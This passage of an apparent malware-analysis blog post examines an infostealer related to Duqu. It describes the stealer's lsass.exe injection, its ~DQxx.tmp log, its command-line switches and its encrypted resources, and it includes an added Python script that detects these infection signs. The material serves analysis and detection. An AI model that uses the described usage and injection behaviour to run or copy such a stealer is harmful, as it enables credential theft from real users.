<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifn-XfDqRqURdniUIfmlCKrwPaAQWz_jkr6tqI0L63wGhxeKR055UnaHnpN-UJDflaVNUuKMiCPOaVzgS9Tq2Qr7xjGity2VvYukT4FvugMNBOZujCoMohiYrayJNJGdAL74_BFlwE/s1600/GUI_subsystem.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifn-XfDqRqURdniUIfmlCKrwPaAQWz_jkr6tqI0L63wGhxeKR055UnaHnpN-UJDflaVNUuKMiCPOaVzgS9Tq2Qr7xjGity2VvYukT4FvugMNBOZujCoMohiYrayJNJGdAL74_BFlwE/s320/GUI_subsystem.png" width="320" /></a></div>
<div style="text-align: center;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 1: WIN32 executable with GUI subsystem.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">PEID does not recognize the file structure of 9749d38ae9b9ddd81b50aad679ee87ec and shows “Nothing found *”.</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1BgBOxD7QdnQ2xh3VxzW-3fKj3oEhuF-5DX5CIVN3jpMLRUSRt_i_O0TaIAM2IJTcq8LZEWB5JbdIOeNKrFQ8cGAhNQigznoK-3B2YYrKK9AWlkGRM8KdJyzidYVmDaL9X5-zuBZt/s1600/PEID.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1BgBOxD7QdnQ2xh3VxzW-3fKj3oEhuF-5DX5CIVN3jpMLRUSRt_i_O0TaIAM2IJTcq8LZEWB5JbdIOeNKrFQ8cGAhNQigznoK-3B2YYrKK9AWlkGRM8KdJyzidYVmDaL9X5-zuBZt/s320/PEID.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 2: PEID found nothing!</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">But based on my past experience in debugging malware and on research, I find it to be compiled in Microsoft Visual C++ with the /GS switch. I actually arrived at this conclusion from what I have seen in its entry point, for it uses the Cookie Generation Security check to avoid buffer overruns. More about cookie generation security can be found in</span></span> <a href="http://msdn.microsoft.com/en-us/library/aa290051(v=vs.71).aspx"><span style="color: blue; font-family: Calibri;"><span style="font-size: 11pt;"><i><u>http://msdn.microsoft.com/en-us/library/aa290051(v=vs.71).aspx</u></i></span></span></a><span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjBufpGlY4JRn86v-0gD4WmnOqPkZT0Jog2AQgeyLrR004x4qbCMimhiNUhHyAXY4VbELAsw2W9dHyGrSppo3-6uNYNosjP1iuCPkptHb_9_4ijAKCG82ej10vBf6QxIYUrvr24WU3/s1600/cookie_generations.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjBufpGlY4JRn86v-0gD4WmnOqPkZT0Jog2AQgeyLrR004x4qbCMimhiNUhHyAXY4VbELAsw2W9dHyGrSppo3-6uNYNosjP1iuCPkptHb_9_4ijAKCG82ej10vBf6QxIYUrvr24WU3/s320/cookie_generations.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 3: Cookie Generation Security check by Microsoft</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ol start="5" style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;" type="I">
<li style="color: #010101; font-family: Calibri; font-size: 11pt; font-weight: bold; margin-left: -7pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">BLACK BOX TESTING</span></div>
</li>
</ol>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Simply running the malware produces nothing, because this infostealer needs to be supplied with the string “xxx” as an argument; e.g. “9749d38ae9b9ddd81b50aad679ee87ec.exe xxx”. It also accepts other arguments, which will be discussed further in the detailed analysis part.</span></span><br />
<span style="color: #010101; font-family: Calibri; text-align: -webkit-auto; text-indent: 13mm;"><span style="font-size: 11pt;">Supplying the string “xxx”, we can see that, by default, it creates a bzip2-compressed file in the %TEMP% folder as ~DQxx.tmp (where xx can be any random hex number), which is held open by lsass.exe as seen in Figure 4a.</span></span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjutRJ5o4TGOJZZwJmjGNalB6qvyfrtHriFx1JCctO2nw39DKj4INyonOY_RqPhZb_u5eiU40k4ghp22PpX3BPQEoSoum_FoPvkEl0Q2MnY0ezyX-eHxk0G-L-_Xhkfk4NrXRBVrG0c/s1600/process.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 13mm;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjutRJ5o4TGOJZZwJmjGNalB6qvyfrtHriFx1JCctO2nw39DKj4INyonOY_RqPhZb_u5eiU40k4ghp22PpX3BPQEoSoum_FoPvkEl0Q2MnY0ezyX-eHxk0G-L-_Xhkfk4NrXRBVrG0c/s320/process.png" width="320" /></a></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<i style="color: #010101; font-family: Calibri; font-size: 11pt; text-indent: 0mm;">Figure 4a: A sign of infection, an encrypted log file ~DQ25.tmp is found in lsass.exe</i></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Another sign of infection is a “sortxxxx.nls” thread seen injected into lsass.exe.</span></span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpp-zdosNbRm0SFDvEPjFMVVbA-TYeOqKNJMrbxx1ESmlFntue2xx7wSFXwOGMpQL1Acx8igLyQtJiI1x_Hw-WO5echFOn5LSvSKmUxwu15-iEb8wBmQNn1T_mAFHoMhly7rQrcn7A/s1600/sortxxx_thread.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpp-zdosNbRm0SFDvEPjFMVVbA-TYeOqKNJMrbxx1ESmlFntue2xx7wSFXwOGMpQL1Acx8igLyQtJiI1x_Hw-WO5echFOn5LSvSKmUxwu15-iEb8wBmQNn1T_mAFHoMhly7rQrcn7A/s200/sortxxx_thread.png" width="176" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 4b: Another sign of infection, sort9760.nls thread is seen injected to lsass.exe</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
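The two infection signs from the black box test (the bzip2-compressed ~DQxx.tmp log in %TEMP% and a sortxxxx.nls thread in lsass.exe) can be checked for on a host with a short script. This is an added example, not code from the original post; the two-hex-digit "xx" and four-hex-digit "xxxx" widths are assumptions taken from the author's ~DQ25.tmp and sort9760.nls examples, and the module dump it scans is a constructed stand-in for Process Explorer output.

```python
"""Host check for the two infection signs described in the black box test.

Added example, not code from the original post. Assumptions: "xx" in ~DQxx.tmp
is two hex digits and "xxxx" in sortxxxx.nls is four (after the author's
~DQ25.tmp / sort9760.nls examples). SAMPLE_MODULES is a constructed
'process<TAB>module' dump standing in for a Process Explorer view.
"""
import bz2
import os
import re
import shutil
import tempfile

# ~DQ + two hex digits + .tmp (assumed width, see module docstring).
DQ_TMP_RE = re.compile(r"^~DQ[0-9A-F]{2}\.tmp$", re.IGNORECASE)
# sort + four hex digits + .nls. Windows ships sortdefault.nls, which must not match.
SORT_NLS_RE = re.compile(r"^sort[0-9A-F]{4}\.nls$", re.IGNORECASE)
BZIP2_MAGIC = b"BZh"

# Constructed content for the demo log file (the real one holds stolen data).
SAMPLE_LOG = b"[keystrokes]\r\nuser typed: hello\r\n"

# Constructed module dump: one hit in lsass.exe, one legitimate decoy
# (sortdefault.nls), one matching name in a process we are not asking about.
SAMPLE_MODULES = [
    "lsass.exe\tC:\\Windows\\System32\\ntdll.dll",
    "lsass.exe\tsort9760.nls",
    "lsass.exe\tC:\\Windows\\Globalization\\Sorting\\sortdefault.nls",
    "explorer.exe\tsortABCD.nls",
]


def is_bzip2_stream(path):
    """True when the file starts with 'BZh' followed by a block-size digit 1-9."""
    with open(path, "rb") as fh:
        head = fh.read(4)
    return len(head) == 4 and head[:3] == BZIP2_MAGIC and head[3] in b"123456789"


def find_dq_logs(temp_dir):
    """Return (name, decompressed_size) for each ~DQxx.tmp in temp_dir that is a bzip2 stream.

    decompressed_size is None when the stream does not decompress cleanly, e.g. the
    logger still has the file open and has not written the end-of-stream marker yet.
    """
    hits = []
    for name in sorted(os.listdir(temp_dir)):
        path = os.path.join(temp_dir, name)
        if not DQ_TMP_RE.match(name) or not os.path.isfile(path):
            continue
        if not is_bzip2_stream(path):
            continue  # right name, wrong content: not this logger's output
        with open(path, "rb") as fh:
            data = fh.read()
        try:
            size = len(bz2.decompress(data))
        except OSError:
            size = None
        hits.append((name, size))
    return hits


def find_injected_nls(module_lines, process="lsass.exe"):
    """Return (process, module) pairs for sortxxxx.nls modules loaded in `process`.

    Each line is 'process<TAB>module'; the module may be a bare name or a full path.
    """
    found = []
    for line in module_lines:
        if "\t" not in line:
            continue
        proc, module = line.strip().split("\t", 1)
        module = os.path.basename(module.strip())
        if proc.lower() == process.lower() and SORT_NLS_RE.match(module):
            found.append((proc, module))
    return found


def build_sample_temp_dir():
    """Create a constructed %TEMP% look-alike: one real hit and two decoys."""
    d = tempfile.mkdtemp(prefix="dq_demo_")
    with open(os.path.join(d, "~DQ25.tmp"), "wb") as fh:  # the hit: a bzip2 stream
        fh.write(bz2.compress(SAMPLE_LOG))
    with open(os.path.join(d, "~DQ3A.tmp"), "wb") as fh:  # right name, plain text
        fh.write(b"not a bzip2 stream")
    with open(os.path.join(d, "~DQ25.log"), "wb") as fh:  # wrong extension
        fh.write(bz2.compress(b"decoy"))
    return d


if __name__ == "__main__":
    demo_dir = build_sample_temp_dir()
    try:
        for name, size in find_dq_logs(demo_dir):
            print("suspicious log: %s (decompressed %s bytes)" % (name, size))
    finally:
        shutil.rmtree(demo_dir)
    for proc, module in find_injected_nls(SAMPLE_MODULES):
        print("suspicious module in %s: %s" % (proc, module))
```

On a live system, point find_dq_logs at os.environ["TEMP"] and feed find_injected_nls the module list exported from Process Explorer or from a script.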
<ol start="6" style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;" type="I">
<li style="color: #010101; font-family: Calibri; font-size: 11pt; font-weight: bold; margin-left: -7pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">DETAILED ANALYSIS</span></div>
</li>
</ol>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><i>9749d38ae9b9ddd81b50aad679ee87ec – The Main Executable a.k.a “The Command Console”</i></b></span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Since this malware is compiled with Microsoft Visual C++, the entry point at 0x00403C91 is not the actual start of the malware's code; instead we have to look for its WinMain entry, which IDA Pro readily identifies. (Yay thanks IDA!)</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqIIuIjbaYJR6N1Si62F64X2uDri_patcU8sIkEhMsoFW0-HyBHjud6u0sACx_fcUtxawXLRZZ-biAKM47J7cLTwQg9G_qgcuhuHuKIEeK1xObWVm3gxB-LYyLiVB2fKYLmACUbIcY/s1600/call_winmain.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqIIuIjbaYJR6N1Si62F64X2uDri_patcU8sIkEhMsoFW0-HyBHjud6u0sACx_fcUtxawXLRZZ-biAKM47J7cLTwQg9G_qgcuhuHuKIEeK1xObWVm3gxB-LYyLiVB2fKYLmACUbIcY/s320/call_winmain.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 5: A Call to WinMain</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">This executable needs a specific command line argument in order for it to function. The usage is as follows:</span></span><br />
<span style="color: #010101; font-family: Calibri; font-size: 11pt; font-style: italic; font-weight: bold; text-align: -webkit-auto;"><br /></span>
<span style="color: #010101; font-family: Calibri; font-size: 11pt; font-style: italic; font-weight: bold; text-align: -webkit-auto;">malware.exe xxx &lt;optional parameters&gt;</span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">By default, the executable spawns an lsass.exe process into which it injects a ~DQxx.tmp located in the %TEMP% directory, where “xx” can be any random hex number.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> Other optional command line parameters are also available:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">/delme - deletes the executable.</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjI14hA2RLn8TdmFQcNcmxAmxRK_ahf0akmAk4NMzaT4SeLXaC-1kTdP8WBVdtHj6Sz9cCL5Ud31jB1OuTpmT9MqDzVV-F77199MsTJUnItgDZ54IkQwcVKM-YedD4jX2vhiwqRNTQ/s1600/delme_param.png" imageanchor="1" style="font-family: Tahoma; line-height: 14px; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjI14hA2RLn8TdmFQcNcmxAmxRK_ahf0akmAk4NMzaT4SeLXaC-1kTdP8WBVdtHj6Sz9cCL5Ud31jB1OuTpmT9MqDzVV-F77199MsTJUnItgDZ54IkQwcVKM-YedD4jX2vhiwqRNTQ/s320/delme_param.png" width="320" /></a></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 6a: “delme” parameter</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">/v - verbose logging, apparently for the author's own debugging; the printf() calls are visible here.</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg1PLUsdnlSiVPz6i3fbqOVaqr-S1hm2YP1zvmeSYQ3zh0-OM8SjfxRAWwcaJ-AxFbxw_wKMqsJBqnX17yCvqYuBkpwjNcI20baEVrVzPlQrenXx1DNvO7qMNoYOFF4tJN8F8Gbrom/s1600/v_param.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg1PLUsdnlSiVPz6i3fbqOVaqr-S1hm2YP1zvmeSYQ3zh0-OM8SjfxRAWwcaJ-AxFbxw_wKMqsJBqnX17yCvqYuBkpwjNcI20baEVrVzPlQrenXx1DNvO7qMNoYOFF4tJN8F8Gbrom/s320/v_param.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 6b: “v” parameter, verbose logging using the printf() function.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<div style="font-family: Symbol;">
<span style="color: #010101; font-family: Calibri;">/quit - terminates the spawned process (lsass.exe by default) that holds the injected .tmp file.</span></div>
<span style="font-family: Calibri;"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSTWEAio1SqWQqvV5LBVJK-7voOshwazx_gzNh2IxkllqpUWfi0_DDEKj85iLqh8h2yGJHISytGGcBhJKNLGZETWbu-25W8quB1djXCz5aAhkGwPyNOD1rOGiplW1StfAErHZGzkFS/s1600/quit_param.png" imageanchor="1" style="font-family: Tahoma; line-height: 14px; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSTWEAio1SqWQqvV5LBVJK-7voOshwazx_gzNh2IxkllqpUWfi0_DDEKj85iLqh8h2yGJHISytGGcBhJKNLGZETWbu-25W8quB1djXCz5aAhkGwPyNOD1rOGiplW1StfAErHZGzkFS/s320/quit_param.png" width="320" /></a></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 6c: “quit” parameter</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<div style="font-family: Symbol;">
<span style="color: #010101; font-family: Calibri;">/restart - restarts or spawns the process (lsass.exe by default) with the injected .tmp file.</span></div>
<span style="font-family: Calibri;"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNWG4PfJanSXbwoASNy7NioohaUgEZBtEd7ghjCo80QWLDN7AFFa9oz3F_a1lVLuffjte-7VtqoLDV1h7qXzBy_rioqhLTWMSfM3yewyJUAQpXiT3QgtR_lsjygqEz9aEVFAjQw3zO/s1600/restart_param.png" imageanchor="1" style="font-family: Tahoma; line-height: 14px; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNWG4PfJanSXbwoASNy7NioohaUgEZBtEd7ghjCo80QWLDN7AFFa9oz3F_a1lVLuffjte-7VtqoLDV1h7qXzBy_rioqhLTWMSfM3yewyJUAQpXiT3QgtR_lsjygqEz9aEVFAjQw3zO/s320/restart_param.png" width="320" /></a></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 6d: “restart” parameter</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">/in &lt;config file&gt; - configuration file that tells the malware which data to steal and record in its log file; if not specified, the default configuration is loaded from one of its resources.</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVzt5cI0Emq2Dk3ZwFithwJCi7M1TnKTQhF_BnxSXSwRa_4Bk3j4WyfhLRT9V1L_vSS41_bnl3GxY2n8OTd_DkNqtT-AKTTnBQ_J2IqJpnhZWNDKwkydCcMlJo0yLxT4e-TInks5CV/s1600/in_param.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVzt5cI0Emq2Dk3ZwFithwJCi7M1TnKTQhF_BnxSXSwRa_4Bk3j4WyfhLRT9V1L_vSS41_bnl3GxY2n8OTd_DkNqtT-AKTTnBQ_J2IqJpnhZWNDKwkydCcMlJo0yLxT4e-TInks5CV/s320/in_param.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 6e: “in” parameter; part of a resource is loaded if /in is not specified.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">/out &lt;filename&gt; - output file for its encrypted log; defaults to ~DQxx.tmp in the %temp% folder if not specified.</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8_64Un9oexrGtI_rkl8epPhnlUBFnw5v5l9HtZ3njkF8gjFKarpJOONx8-9NdWGCbffDlQnYuJ2PoUHE-3WoSiso1JKG-rqXiyUV0eLFZQJBx4xgoTvGYVTZlSmExPZadA7khHIod/s1600/out_param.png" imageanchor="1" style="font-family: Tahoma; line-height: 14px; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="303" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8_64Un9oexrGtI_rkl8epPhnlUBFnw5v5l9HtZ3njkF8gjFKarpJOONx8-9NdWGCbffDlQnYuJ2PoUHE-3WoSiso1JKG-rqXiyUV0eLFZQJBx4xgoTvGYVTZlSmExPZadA7khHIod/s320/out_param.png" width="320" /></a></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 6f: “out” parameter, a ~DQxx.tmp file in %temp% folder is created if /out is not specified.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The executable has two resources in its .rsrc section, #200 and #201. #200 is the encrypted DLL component, while #201 is the encrypted configuration file that specifies which stealing routines to execute later. Both resources are mapped into memory.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The executable then decrypts its DLL module, which is stored in resource #200 embedded inside a JPEG file. Vipre detects this DLL as Trojan.Win32.Duqu.d (v); its MD5 is 9a9e77d2b7792fbbddcd7ce05a4eb26e.</span></span></div>
